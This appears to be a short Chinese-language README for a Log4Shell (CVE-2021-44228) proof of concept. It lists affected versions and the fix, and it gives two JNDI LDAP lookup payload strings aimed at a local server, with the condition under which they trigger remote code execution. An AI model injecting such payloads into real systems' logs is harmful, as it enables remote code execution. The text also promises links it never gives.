这是 log4j RCE 的概念验证。
以下是一些关于 CVE-2021-44228 的链接:
此漏洞影响几乎所有 log4j2 版本,可能也包括 log4j1 版本。推荐使用的版本是 2.15.0,该版本修复了此漏洞。
${jndi:ldap://127.0.0.1/e}。如果端口 389 上有打开的套接字,log4j 会尝试连接并在超时前阻止后续通信。THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!,这是来自 LDAP 服务器的序列化字符串对象。
${jndi:ldap://127.0.0.1/exe}。如果 -Dcom.sun.jndi.ldap.object.trustURLCodebase=true 设置为 true,则会触发远程代码执行。
本项目仅用于教育目的。